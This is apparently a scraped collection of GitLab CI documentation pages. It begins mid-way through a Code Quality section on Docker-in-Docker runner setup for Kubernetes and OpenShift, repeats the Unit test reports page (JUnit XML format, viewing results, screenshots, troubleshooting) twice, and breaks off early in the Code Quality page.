Docker-in-Docker](https://docs.gitlab.com/runner/executors/kubernetes/#using-dockerdind). To ensure Code Quality jobs can run on a Kubernetes executor: - If you're using TLS to communicate with the Docker daemon, the executor [must be running in privileged mode](https://docs.gitlab.com/runner/executors/kubernetes/#other-configtoml-settings). Additionally, the certificate directory must be [specified as a volume mount](../docker/using_docker_build.md#docker-in-docker-with-tls-enabled-in-kubernetes). - It is possible that the DinD service doesn't start up fully before the Code Quality job starts. This is a limitation documented in [Troubleshooting the Kubernetes executor](https://docs.gitlab.com/runner/executors/kubernetes/troubleshooting.html#docker-cannot-connect-to-the-docker-daemon-at-tcpdocker2375-is-the-docker-daemon-running). To resolve the issue, use `before_script` to wait for the Docker daemon to fully boot up. For an example, see the configuration in the `.gitlab-ci.yml` file described in the following section. #### Kubernetes To run Code Quality in Kubernetes: - The Docker in Docker service must be added as a service container in the `config.toml` file. - The Docker daemon in the service container must listen on a TCP and UNIX socket, as both sockets are required by Code Quality. - The Docker socket must be shared with a volume. Due to a [Docker requirement](https://docs.docker.com/reference/cli/docker/container/run/#privileged), the privileged flag must be enabled for the service container. ```toml [runners.kubernetes] [runners.kubernetes.service_container_security_context] privileged = true allow_privilege_escalation = true [runners.kubernetes.volumes] [[runners.kubernetes.volumes.empty_dir]] mount_path = "/var/run/" name = "docker-sock" [[runners.kubernetes.services]] alias = "dind" command = [ "--host=tcp://0.0.0.0:2375", "--host=unix://var/run/docker.sock", "--storage-driver=overlay2" ] entrypoint = ["dockerd"] name = "docker:20.10.12-dind" ``` {{< alert type="note" >}} If you use the [GitLab Runner Helm Chart](https://docs.gitlab.com/runner/install/kubernetes.html), you can use the previous Kubernetes configuration in the [`config` field](https://docs.gitlab.com/runner/install/kubernetes_helm_chart_configuration.html) of the `values.yaml` file. x {{< /alert >}} To ensure that you use the `overlay2` [storage driver](https://docs.docker.com/storage/storagedriver/select-storage-driver/), which offers the best overall performance: - Specify the `DOCKER_HOST` that the Docker CLI communicates with. - Set the `DOCKER_DRIVER` variable to empty. Use the `before_script` section to wait for the Docker daemon to fully boot up. Since GitLab Runner v16.9, this can also be done [by just setting the `HEALTHCHECK_TCP_PORT` variable](https://docs.gitlab.com/runner/executors/kubernetes/#define-a-list-of-services). ```yaml include: - template: Code-Quality.gitlab-ci.yml code_quality: services: [] variables: DOCKER_HOST: tcp://dind:2375 DOCKER_DRIVER: "" before_script: - while ! docker info > /dev/null 2>&1; do sleep 1; done ``` #### OpenShift For OpenShift, you should use the [GitLab Runner Operator](https://docs.gitlab.com/runner/install/operator.html). To give the Docker daemon in the service container permissions to initialize its storage, you must mount the `/var/lib` directory as a volume mount. {{< alert type="note" >}} If you cannot to mount the `/var/lib` directory as a volume mount, you can set `--storage-driver` to `vfs` instead. If you opt for the `vfs` value, it might have a negative impact on [performance](https://docs.docker.com/storage/storagedriver/select-storage-driver/). {{< /alert >}} To configure permissions for the Docker daemon: 1. Create a `config.toml` file with this configuration template to customize the runner's configuration: ```toml [[runners]] [runners.kubernetes] [runners.kubernetes.service_container_security_context] privileged = true allow_privilege_escalation = true [runners.kubernetes.volumes] [[runners.kubernetes.volumes.empty_dir]] mount_path = "/var/run/" name = "docker-sock" [[runners.kubernetes.volumes.empty_dir]] mount_path = "/var/lib/" name = "docker-data" [[runners.kubernetes.services]] alias = "dind" command = [ "--host=tcp://0.0.0.0:2375", "--host=unix://var/run/docker.sock", "--storage-driver=overlay2" ] entrypoint = ["dockerd"] name = "docker:20.10.12-dind" ``` 1. [Set the custom configuration to your runner](https://docs.gitlab.com/runner/configuration/configuring_runner_operator.html#customize-configtoml-with-a-configuration-template). 1. Optional. Attach a [`privileged` service account](https://docs.openshift.com/container-platform/3.11/admin_guide/manage_scc.html) to the build Pod. This depends on your OpenShift cluster setup: ```shell oc create sa dind-sa oc adm policy add-scc-to-user anyuid -z dind-sa oc adm policy add-scc-to-user -z dind-sa privileged ``` 1. Set the permissions in the [`[runners.kubernetes]` section](https://docs.gitlab.com/runner/executors/kubernetes/#other-configtoml-settings). 1. Set the job definition stays the same as in Kubernetes case: ```yaml include: - template: Code-Quality.gitlab-ci.yml code_quality: services: [] variables: DOCKER_HOST: tcp://dind:2375 DOCKER_DRIVER: "" before_script: - while ! docker info > /dev/null 2>&1; do sleep 1; done ``` #### Volumes and Docker storage Docker stores all of its data in the `/var/lib` volume, which could result in a large volume. To reuse Docker-in-Docker storage across the cluster, you can use [Persistent Volumes](https://kubernetes.io/docs/concepts/storage/persistent-volumes/) as an alternative. <!--- end_remove -->
https://docs.gitlab.com/ci/unit_test_reports
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/unit_test_reports.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
unit_test_reports.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Unit test reports
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Unit test reports display test results directly in merge requests and pipeline details, so you can identify failures without searching through job logs. Use unit test reports when you want to: - See test failures immediately in merge requests. - Compare test results between branches. - Debug failing tests with error details and screenshots. - Track test failure patterns over time. Unit test reports require the JUnit XML format and do not affect job status. To make a job fail when tests fail, your job's [script](../yaml/_index.md#script) must exit with a non-zero status. GitLab Runner uploads your test results in JUnit XML format as [artifacts](../yaml/artifacts_reports.md#artifactsreportsjunit). When you go to a merge request, your test results are compared between the source branch (head) and target branch (base) to show what changed. ## File format and size limits Unit test reports must use JUnit XML format with specific requirements to ensure proper parsing and display. ### File requirements Your test report files must: - Use JUnit XML format with `.xml` file extension. - Be smaller than 30 MB per individual file. - Have a total size under 100 MB for all JUnit files in a job. If you have duplicate test names, only the first test is used and others with the same name are ignored. For test case limits, see [Maximum test cases per unit test report](../../user/gitlab_com/_index.md#cicd). ### JUnit XML format specification GitLab parses the following elements and attributes from your JUnit XML files: | XML Element | XML Attribute | Description | | ------------ | --------------- | ----------- | | `testsuite` | `name` | Test suite name (parsed but not displayed in UI) | | `testcase` | `classname` | Test class or category name (used as the suite name) | | `testcase` | `name` | Individual test name | | `testcase` | `file` | File path where the test is defined | | `testcase` | `time` | Test execution time in seconds | | `failure` | Element content | Failure message and stack trace | | `error` | Element content | Error message and stack trace | | `skipped` | Element content | Reason for skipping the test | | `system-out` | Element content | System output and attachment tags (only parsed from `testcase` elements) | | `system-err` | Element content | System error output (only parsed from `testcase` elements) | {{< alert type="note" >}} The `testcase classname` attribute is used as the suite name, not the `testsuite name` attribute. {{< /alert >}} #### XML structure example ```xml <testsuites> <testsuite name="Authentication Tests" tests="1" failures="1"> <testcase classname="LoginTest" name="test_invalid_password" file="spec/auth_spec.rb" time="0.23"> <failure>Expected authentication to fail</failure> <system-out>[[ATTACHMENT|screenshots/failure.png]]</system-out> </testcase> </testsuite> </testsuites> ``` This XML displays in GitLab as: - Suite: `LoginTest` (from `testcase classname`) - Name: `test_invalid_password` (from `testcase name`) - File: `spec/auth_spec.rb` (from `testcase file`) - Time: `0.23s` (from `testcase time`) - Screenshot: Available in test details dialog (from `testcase system-out`) - Not displayed: "Authentication Tests" (from `testsuite name`) ## Test result types Test results are compared between the merge request's source and target branches to show what changed: - Newly failed tests: Tests that passed on the target branch but failed on your branch. - Newly encountered errors: Tests that passed on the target branch but had errors on your branch. - Existing failures: Tests that failed on both branches. - Resolved failures: Tests that failed on the target branch but passed on your branch. If branches cannot be compared, for example when there is no target branch data yet, only the failed tests from your branch are shown. For tests that failed in the default branch in the last 14 days, you see a message like `Failed {n} time(s) in {default_branch} in the last 14 days`. This count includes failed tests from completed pipelines, but not [blocked pipelines](../jobs/job_control.md#types-of-manual-jobs). Support for blocked pipelines is proposed in [issue 431265](https://gitlab.com/gitlab-org/gitlab/-/issues/431265). ## Configure unit test reports Configure unit test reports to display test results in merge requests and pipelines. To configure unit test reports: 1. Configure your test job to output JUnit XML format test reports. For configuration details, review your testing framework's documentation. 1. In your `.gitlab-ci.yml` file, add [`artifacts:reports:junit`](../yaml/artifacts_reports.md#artifactsreportsjunit) to your test job. 1. Specify the path to your XML test report files. 1. Optional. To make report files browsable, include them with [`artifacts:paths`](../yaml/_index.md#artifactspaths). 1. Optional. To upload reports even when jobs fail, use [`artifacts:when:always`](../yaml/_index.md#artifactswhen). Example configuration for Ruby with RSpec: ```yaml ruby: stage: test script: - bundle install - bundle exec rspec --format progress --format RspecJunitFormatter --out rspec.xml artifacts: when: always paths: - rspec.xml reports: junit: rspec.xml ``` You can view test results: - In the **Tests** tab of pipeline details after your test job completes. - In the **Test summary** panel of merge requests after your pipeline completes. ## View test results in merge requests View detailed information about test failures in merge requests. The **Test summary** panel shows an overview of your test results, including how many tests failed and passed. ![Expanded Test summary panel that shows one failed test with the View details link](img/test_summary_panel_expanded_v18_1.png) To view test failure details: 1. In a merge request, go to the **Test summary** panel. 1. To expand the **Test summary** panel, select **Show details** ({{< icon name="chevron-lg-down" >}}). 1. Select **View details** next to a failed test. The dialog displays the test name, file path, execution time, screenshot attachment (if configured), and error output. To view all test results: - From the **Test summary** panel, select **Full report** to go to the **Tests** tab in the pipeline details. ### Copy failed test names Copy test names to rerun them locally for debugging. Prerequisites: - Your JUnit report must include `<file>` attributes for failed tests. To copy all failed test names: - From the **Test summary** panel, select **Copy failed tests** ({{< icon name="copy-to-clipboard" >}}). The failed tests are copied as a space-separated string. To copy a single failed test name: 1. To expand the **Test summary** panel, select **Show details** ({{< icon name="chevron-lg-down" >}}). 1. Select **View details** next to the test you want to copy. 1. In the dialog, select **Copy test name to rerun locally** ({{< icon name="copy-to-clipboard" >}}). The test name is copied to your clipboard. ## View test results in pipelines View all test suites and cases in pipeline details. To view pipeline test results: 1. Go to your pipeline details page. 1. Select the **Tests** tab. 1. Select any test suite to see individual test cases. ![Test results showing 1671 tests with 1 minute 11 seconds total execution time and individual job execution times.](img/pipelines_junit_test_report_v18_3.png) You can also retrieve test reports with the [Pipelines API](../../api/pipelines.md#get-a-test-report-for-a-pipeline). ### Test timing metrics Test results display different timing metrics: Pipeline duration : Elapsed time from when the pipeline starts until it completes. Test execution time : Total time spent running all tests across all jobs, added together. Queue time : Time jobs spent waiting for available runners. When jobs run in parallel, cumulative test execution time can exceed pipeline duration. Pipeline duration shows how long you wait for results, while test execution time shows compute resources used. For example, a pipeline that completes in 81 minutes might show 9 hours 10 minutes of test execution time if many test jobs run in parallel across multiple runners. ## Add screenshots to test reports Add screenshots to test reports to help debug test failures. To add screenshots to test reports: 1. In your JUnit XML file, add attachment tags with screenshot paths relative to `$CI_PROJECT_DIR`: ```xml <testcase time="1.00" name="Test"> <system-out>[[ATTACHMENT|/path/to/some/file]]</system-out> </testcase> ``` 1. In your `.gitlab-ci.yml` file, configure your job to upload screenshots as artifacts: - Specify the path to your screenshot files. - Optional. Use [`artifacts:when: always`](../yaml/_index.md#artifactswhen) to upload screenshots when tests fail. For example: ```yaml ruby: stage: test script: - bundle install - bundle exec rspec --format progress --format RspecJunitFormatter --out rspec.xml - # Your test framework should save screenshots to a directory artifacts: when: always paths: - rspec.xml - screenshots/ reports: junit: rspec.xml ``` 1. Run your pipeline. You can access the screenshot link in the test details dialog when you select **View details** for a failed test in the **Test summary** panel. ![A failed unit test report with test details and screenshot attachment](img/unit_test_report_screenshot_v18_1.png) ## Troubleshooting ### Test report appears empty You might see an empty **Test summary** panel in merge requests. This issue occurs when: - Report artifacts have expired. - JUnit files exceed size limits. To resolve this issue, set a longer [`expire_in`](../yaml/_index.md#artifactsexpire_in) value for the report artifact, or run a new pipeline to generate a new report. If JUnit files exceed size limits, ensure: - Individual JUnit files are less than 30 MB. - The total size of all JUnit files for the job is less than 100 MB. Support for custom limits is proposed in [epic 16374](https://gitlab.com/groups/gitlab-org/-/epics/16374). ### Test results are missing You might see fewer test results than expected in your reports. This can happen when you have duplicate test names in your JUnit XML file. Only the first test for each name is used and duplicates are ignored. To resolve this issue, ensure all test names and classes are unique. ### No test reports appear in merge requests You might not see the **Test summary** panel at all in merge requests. This issue can happen when the target branch has no test data for comparison. To resolve this issue, run a pipeline on your target branch to generate baseline test data. ### JUnit XML parsing errors You might see parsing error indicators next to job names in your pipeline. This can happen when JUnit XML files contain formatting errors or invalid elements. To resolve this issue: - Verify your JUnit XML files follow the standard format. - Check that all XML elements are properly closed. - Ensure attribute names and values are correctly formatted. For [grouped jobs](../jobs/_index.md#group-similar-jobs-together-in-pipeline-views), only the first parsing error from the group is displayed.
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Unit test reports breadcrumbs: - doc - ci - testing --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Unit test reports display test results directly in merge requests and pipeline details, so you can identify failures without searching through job logs. Use unit test reports when you want to: - See test failures immediately in merge requests. - Compare test results between branches. - Debug failing tests with error details and screenshots. - Track test failure patterns over time. Unit test reports require the JUnit XML format and do not affect job status. To make a job fail when tests fail, your job's [script](../yaml/_index.md#script) must exit with a non-zero status. GitLab Runner uploads your test results in JUnit XML format as [artifacts](../yaml/artifacts_reports.md#artifactsreportsjunit). When you go to a merge request, your test results are compared between the source branch (head) and target branch (base) to show what changed. ## File format and size limits Unit test reports must use JUnit XML format with specific requirements to ensure proper parsing and display. ### File requirements Your test report files must: - Use JUnit XML format with `.xml` file extension. - Be smaller than 30 MB per individual file. - Have a total size under 100 MB for all JUnit files in a job. If you have duplicate test names, only the first test is used and others with the same name are ignored. For test case limits, see [Maximum test cases per unit test report](../../user/gitlab_com/_index.md#cicd). ### JUnit XML format specification GitLab parses the following elements and attributes from your JUnit XML files: | XML Element | XML Attribute | Description | | ------------ | --------------- | ----------- | | `testsuite` | `name` | Test suite name (parsed but not displayed in UI) | | `testcase` | `classname` | Test class or category name (used as the suite name) | | `testcase` | `name` | Individual test name | | `testcase` | `file` | File path where the test is defined | | `testcase` | `time` | Test execution time in seconds | | `failure` | Element content | Failure message and stack trace | | `error` | Element content | Error message and stack trace | | `skipped` | Element content | Reason for skipping the test | | `system-out` | Element content | System output and attachment tags (only parsed from `testcase` elements) | | `system-err` | Element content | System error output (only parsed from `testcase` elements) | {{< alert type="note" >}} The `testcase classname` attribute is used as the suite name, not the `testsuite name` attribute. {{< /alert >}} #### XML structure example ```xml <testsuites> <testsuite name="Authentication Tests" tests="1" failures="1"> <testcase classname="LoginTest" name="test_invalid_password" file="spec/auth_spec.rb" time="0.23"> <failure>Expected authentication to fail</failure> <system-out>[[ATTACHMENT|screenshots/failure.png]]</system-out> </testcase> </testsuite> </testsuites> ``` This XML displays in GitLab as: - Suite: `LoginTest` (from `testcase classname`) - Name: `test_invalid_password` (from `testcase name`) - File: `spec/auth_spec.rb` (from `testcase file`) - Time: `0.23s` (from `testcase time`) - Screenshot: Available in test details dialog (from `testcase system-out`) - Not displayed: "Authentication Tests" (from `testsuite name`) ## Test result types Test results are compared between the merge request's source and target branches to show what changed: - Newly failed tests: Tests that passed on the target branch but failed on your branch. - Newly encountered errors: Tests that passed on the target branch but had errors on your branch. - Existing failures: Tests that failed on both branches. - Resolved failures: Tests that failed on the target branch but passed on your branch. If branches cannot be compared, for example when there is no target branch data yet, only the failed tests from your branch are shown. For tests that failed in the default branch in the last 14 days, you see a message like `Failed {n} time(s) in {default_branch} in the last 14 days`. This count includes failed tests from completed pipelines, but not [blocked pipelines](../jobs/job_control.md#types-of-manual-jobs). Support for blocked pipelines is proposed in [issue 431265](https://gitlab.com/gitlab-org/gitlab/-/issues/431265). ## Configure unit test reports Configure unit test reports to display test results in merge requests and pipelines. To configure unit test reports: 1. Configure your test job to output JUnit XML format test reports. For configuration details, review your testing framework's documentation. 1. In your `.gitlab-ci.yml` file, add [`artifacts:reports:junit`](../yaml/artifacts_reports.md#artifactsreportsjunit) to your test job. 1. Specify the path to your XML test report files. 1. Optional. To make report files browsable, include them with [`artifacts:paths`](../yaml/_index.md#artifactspaths). 1. Optional. To upload reports even when jobs fail, use [`artifacts:when:always`](../yaml/_index.md#artifactswhen). Example configuration for Ruby with RSpec: ```yaml ruby: stage: test script: - bundle install - bundle exec rspec --format progress --format RspecJunitFormatter --out rspec.xml artifacts: when: always paths: - rspec.xml reports: junit: rspec.xml ``` You can view test results: - In the **Tests** tab of pipeline details after your test job completes. - In the **Test summary** panel of merge requests after your pipeline completes. ## View test results in merge requests View detailed information about test failures in merge requests. The **Test summary** panel shows an overview of your test results, including how many tests failed and passed. ![Expanded Test summary panel that shows one failed test with the View details link](img/test_summary_panel_expanded_v18_1.png) To view test failure details: 1. In a merge request, go to the **Test summary** panel. 1. To expand the **Test summary** panel, select **Show details** ({{< icon name="chevron-lg-down" >}}). 1. Select **View details** next to a failed test. The dialog displays the test name, file path, execution time, screenshot attachment (if configured), and error output. To view all test results: - From the **Test summary** panel, select **Full report** to go to the **Tests** tab in the pipeline details. ### Copy failed test names Copy test names to rerun them locally for debugging. Prerequisites: - Your JUnit report must include `<file>` attributes for failed tests. To copy all failed test names: - From the **Test summary** panel, select **Copy failed tests** ({{< icon name="copy-to-clipboard" >}}). The failed tests are copied as a space-separated string. To copy a single failed test name: 1. To expand the **Test summary** panel, select **Show details** ({{< icon name="chevron-lg-down" >}}). 1. Select **View details** next to the test you want to copy. 1. In the dialog, select **Copy test name to rerun locally** ({{< icon name="copy-to-clipboard" >}}). The test name is copied to your clipboard. ## View test results in pipelines View all test suites and cases in pipeline details. To view pipeline test results: 1. Go to your pipeline details page. 1. Select the **Tests** tab. 1. Select any test suite to see individual test cases. ![Test results showing 1671 tests with 1 minute 11 seconds total execution time and individual job execution times.](img/pipelines_junit_test_report_v18_3.png) You can also retrieve test reports with the [Pipelines API](../../api/pipelines.md#get-a-test-report-for-a-pipeline). ### Test timing metrics Test results display different timing metrics: Pipeline duration : Elapsed time from when the pipeline starts until it completes. Test execution time : Total time spent running all tests across all jobs, added together. Queue time : Time jobs spent waiting for available runners. When jobs run in parallel, cumulative test execution time can exceed pipeline duration. Pipeline duration shows how long you wait for results, while test execution time shows compute resources used. For example, a pipeline that completes in 81 minutes might show 9 hours 10 minutes of test execution time if many test jobs run in parallel across multiple runners. ## Add screenshots to test reports Add screenshots to test reports to help debug test failures. To add screenshots to test reports: 1. In your JUnit XML file, add attachment tags with screenshot paths relative to `$CI_PROJECT_DIR`: ```xml <testcase time="1.00" name="Test"> <system-out>[[ATTACHMENT|/path/to/some/file]]</system-out> </testcase> ``` 1. In your `.gitlab-ci.yml` file, configure your job to upload screenshots as artifacts: - Specify the path to your screenshot files. - Optional. Use [`artifacts:when: always`](../yaml/_index.md#artifactswhen) to upload screenshots when tests fail. For example: ```yaml ruby: stage: test script: - bundle install - bundle exec rspec --format progress --format RspecJunitFormatter --out rspec.xml - # Your test framework should save screenshots to a directory artifacts: when: always paths: - rspec.xml - screenshots/ reports: junit: rspec.xml ``` 1. Run your pipeline. You can access the screenshot link in the test details dialog when you select **View details** for a failed test in the **Test summary** panel. ![A failed unit test report with test details and screenshot attachment](img/unit_test_report_screenshot_v18_1.png) ## Troubleshooting ### Test report appears empty You might see an empty **Test summary** panel in merge requests. This issue occurs when: - Report artifacts have expired. - JUnit files exceed size limits. To resolve this issue, set a longer [`expire_in`](../yaml/_index.md#artifactsexpire_in) value for the report artifact, or run a new pipeline to generate a new report. If JUnit files exceed size limits, ensure: - Individual JUnit files are less than 30 MB. - The total size of all JUnit files for the job is less than 100 MB. Support for custom limits is proposed in [epic 16374](https://gitlab.com/groups/gitlab-org/-/epics/16374). ### Test results are missing You might see fewer test results than expected in your reports. This can happen when you have duplicate test names in your JUnit XML file. Only the first test for each name is used and duplicates are ignored. To resolve this issue, ensure all test names and classes are unique. ### No test reports appear in merge requests You might not see the **Test summary** panel at all in merge requests. This issue can happen when the target branch has no test data for comparison. To resolve this issue, run a pipeline on your target branch to generate baseline test data. ### JUnit XML parsing errors You might see parsing error indicators next to job names in your pipeline. This can happen when JUnit XML files contain formatting errors or invalid elements. To resolve this issue: - Verify your JUnit XML files follow the standard format. - Check that all XML elements are properly closed. - Ensure attribute names and values are correctly formatted. For [grouped jobs](../jobs/_index.md#group-similar-jobs-together-in-pipeline-views), only the first parsing error from the group is displayed.
https://docs.gitlab.com/ci/code_quality
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/code_quality.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
code_quality.md
Application Security Testing
Static Analysis
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Code Quality
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Code Quality identifies maintainability issues before they become technical debt. The automated feedback that occurs during code reviews can help your team write better code. The findings appear directly in merge requests, making problems visible when they're most cost-effective to fix. Code Quality works with multiple programming languages and integrates with common linters, style checkers, and complexity analyzers. Your existing tools can feed into the Code Quality workflow, preserving your team's preferences while standardizing how results are displayed. ## Features per tier Different features are available in different [GitLab tiers](https://about.gitlab.com/pricing/), as shown in the following table: | Feature | In Free | In Premium | In Ultimate | |:--------------------------------------------------------------------------------------------|:-------------------------------------|:-------------------------------------|:------------| | [Import Code Quality results from CI/CD jobs](#import-code-quality-results-from-a-cicd-job) | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | | [Use CodeClimate-based scanning](#use-the-built-in-code-quality-cicd-template-deprecated) | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | | [See findings in a merge request widget](#merge-request-widget) | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | | [See findings in a pipeline report](#pipeline-details-view) | {{< icon name="dotted-circle" >}} No | {{< icon name="check-circle" >}} Yes | {{< icon name="check-circle" >}} Yes | | [See findings in the merge request changes view](#merge-request-changes-view) | {{< icon name="dotted-circle" >}} No | {{< icon name="dotted-circle" >}} No | {{< icon name="check-circle" >}} Yes | | [Analyze overall health in a project quality summary view](#project-quality-view) | {{< icon name="dotted-circle" >}} No | {{< icon name="dotted-circle" >}} No | {{< icon name="check-circle" >}} Yes | ## Scan code for quality violations Code Quality is an open system that supports importing results from many scanning tools. To find violations and surface them, you can: - Directly use a scanning tool and [import its results](#import-code-quality-results-from-a-cicd-job). _(Preferred.)_ - [Use a built-in CI/CD template](#use-the-built-in-code-quality-cicd-template-deprecated) to enable scanning. The template uses the CodeClimate engine, which wraps common open source tools. _(Deprecated.)_ You can capture results from multiple tools in a single pipeline. For example, you can run a code linter to scan your code along with a language linter to scan your documentation, or you can use a standalone tool along with CodeClimate-based scanning. Code Quality combines all of the reports so you see all of them when you [view results](#view-code-quality-results). ### Import Code Quality results from a CI/CD job Many development teams already use linters, style checkers, or other tools in their CI/CD pipelines to automatically detect violations of coding standards. You can make the findings from these tools easier to see and fix by integrating them with Code Quality. To see if your tool already has a documented integration, see [Integrate common tools with Code Quality](#integrate-common-tools-with-code-quality). To integrate a different tool with Code Quality: 1. Add the tool to your CI/CD pipeline. 1. Configure the tool to output a report as a file. - This file must use a [specific JSON format](#code-quality-report-format). - Many tools support this output format natively. They may call it a "CodeClimate report", "GitLab Code Quality report", or another similar name. - Other tools can sometimes create JSON output using a custom JSON format or template. Because the [report format](#code-quality-report-format) has only a few required fields, you may be able to use this output type to create a report for Code Quality. 1. Declare a [`codequality` report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) that matches this file. Now, after the pipeline runs, the quality tool's results are [processed and displayed](#view-code-quality-results). ### Use the built-in Code Quality CI/CD template (deprecated) {{< alert type="warning" >}} This feature was [deprecated](../../update/deprecations.md#codeclimate-based-code-quality-scanning-will-be-removed) in GitLab 17.3 and is planned for removal in 19.0. [Integrate the results from a supported tool directly](#import-code-quality-results-from-a-cicd-job) instead. {{< /alert >}} Code Quality also includes a built-in CI/CD template, `Code-Quality.gitlab-ci.yaml`. This template runs a scan based on the open source CodeClimate scanning engine. The CodeClimate engine runs: - Basic maintainability checks for a [set of supported languages](https://docs.codeclimate.com/docs/supported-languages-for-maintainability). - A configurable set of [plugins](https://docs.codeclimate.com/docs/list-of-engines), which wrap open source scanners, to analyze your source code. For more details, see [Configure CodeClimate-based Code Quality scanning](code_quality_codeclimate_scanning.md). #### Migrate from CodeClimate-based scanning The CodeClimate engine uses a customizable set of [analysis plugins](code_quality_codeclimate_scanning.md#configure-codeclimate-analysis-plugins). Some are on by default; others must be explicitly enabled. The following integrations are available to replace the built-in plugins: | Plugin | On by default | Replacement | |--------------|------------------------------------------------------------|-------------| | Duplication | {{< icon name="check-circle" >}} Yes | [Integrate PMD Copy/Paste Detector](#pmd-copypaste-detector). | | ESLint | {{< icon name="check-circle" >}} Yes | [Integrate ESLint](#eslint). | | gofmt | {{< icon name="dotted-circle" >}} No | [Integrate golangci-lint](#golangci-lint) and enable the [gofmt linter](https://golangci-lint.run/usage/linters#gofmt). | | golint | {{< icon name="dotted-circle" >}} No | [Integrate golangci-lint](#golangci-lint) and enable one of the included linters that replaces golint. golint is [deprecated and frozen](https://github.com/golang/go/issues/38968). | | govet | {{< icon name="dotted-circle" >}} No | [Integrate golangci-lint](#golangci-lint). golangci-lint [includes govet by default](https://golangci-lint.run/usage/linters#enabled-by-default). | | markdownlint | {{< icon name="dotted-circle" >}} No (community-supported) | [Integrate markdownlint-cli2](#markdownlint-cli2). | | pep8 | {{< icon name="dotted-circle" >}} No | Integrate an alternative Python linter like [Flake8](#flake8), [Pylint](#pylint), or [Ruff](#ruff). | | RuboCop | {{< icon name="dotted-circle" >}} Yes | [Integrate RuboCop](#rubocop). | | SonarPython | {{< icon name="dotted-circle" >}} No | Integrate an alternative Python linter like [Flake8](#flake8), [Pylint](#pylint), or [Ruff](#ruff). | | Stylelint | {{< icon name="dotted-circle" >}} No (community-supported) | [Integrate Stylelint](#stylelint). | | SwiftLint | {{< icon name="dotted-circle" >}} No | [Integrate SwiftLint](#swiftlint). | ## View Code Quality results Code Quality results are shown in the: - [Merge request widget](#merge-request-widget) - [Merge request changes view](#merge-request-changes-view) - [Pipeline details view](#pipeline-details-view) - [Project quality view](#project-quality-view) ### Merge request widget Code Quality analysis results display in the merge request widget area if a report from the target branch is available for comparison. The merge request widget displays Code Quality findings and resolutions that were introduced by the changes made in the merge request. Multiple Code Quality findings with identical fingerprints display as a single entry in the merge request widget. Each individual finding is available in the full report available in the **Pipeline** details view. ![List of code quality issues in the merge request, ordered by decreasing severity](img/code_quality_merge_request_widget_v18_2.png) ### Merge request changes view {{< details >}} - Tier: Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Code Quality results display in the merge request **Changes** view. Lines containing Code Quality issues are marked by a symbol beside the gutter. Select the symbol to see the list of issues, then select an issue to see its details. ![Lines in a merge request's changes tab marked with a symbol to indicate code quality issues](img/code_quality_changes_view_v18_2.png) ### Pipeline details view {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} The full list of Code Quality violations generated by a pipeline is shown in the **Code Quality** tab of the pipeline's details page. The pipeline details view displays all Code Quality findings that were found on the branch it was run on. ![List of all issues in the branch, ordered by decreasing severity](img/code_quality_pipeline_details_view_v18_2.png) ### Project quality view {{< details >}} - Tier: Ultimate - Offering: GitLab.com, GitLab Self-Managed - Status: Beta {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/72724) in GitLab 14.5 [with a flag](../../administration/feature_flags/_index.md) named `project_quality_summary_page`. This feature is in [beta](../../policy/development_stages_support.md). Disabled by default. {{< /history >}} The project quality view displays an overview of the code quality findings. The view can be found under **Analyze > CI/CD analytics**, and requires [`project_quality_summary_page`](../../administration/feature_flags/_index.md) feature flag to be enabled for this particular project. ![Total number of issues, called violations, followed by the number of issues of each severity](img/code_quality_summary_v15_9.png) ## Code Quality report format You can [import Code Quality results](#import-code-quality-results-from-a-cicd-job) from any tool that can output a report in the following format. This format is a version of the [CodeClimate report format](https://github.com/codeclimate/platform/blob/master/spec/analyzers/SPEC.md#data-types) that includes a smaller number of fields. The file you provide as [Code Quality report artifact](../yaml/artifacts_reports.md#artifactsreportscodequality) must contain a single JSON array. Each object in that array must have at least the following properties: | Name | Type | Description | |-----------------------------------------------------------|---------|-------------| | `description` | String | A human-readable description of the code quality violation. | | `check_name` | String | A unique name representing the check, or rule, associated with this violation. | | `fingerprint` | String | A unique fingerprint to identify this specific code quality violation, such as a hash of its contents. | | `location.path` | String | The file containing the code quality violation, expressed as a relative path in the repository. Do not prefix with `./`. | | `location.lines.begin` or `location.positions.begin.line` | Integer | The line on which the code quality violation occurred. | | `severity` | String | The severity of the violation, can be one of `info`, `minor`, `major`, `critical`, or `blocker`. | The format is different from the [CodeClimate report format](https://github.com/codeclimate/platform/blob/master/spec/analyzers/SPEC.md#data-types) in the following ways: - Although the [CodeClimate report format](https://github.com/codeclimate/platform/blob/master/spec/analyzers/SPEC.md#data-types) supports more properties, Code Quality only processes the fields listed previously. - The GitLab parser does not allow a [byte order mark](https://en.wikipedia.org/wiki/Byte_order_mark) at the beginning of the file. For example, this is a compliant report: ```json [ { "description": "'unused' is assigned a value but never used.", "check_name": "no-unused-vars", "fingerprint": "7815696ecbf1c96e6894b779456d330e", "severity": "minor", "location": { "path": "lib/index.js", "lines": { "begin": 42 } } } ] ``` ## Integrate common tools with Code Quality Many tools natively support the required [report 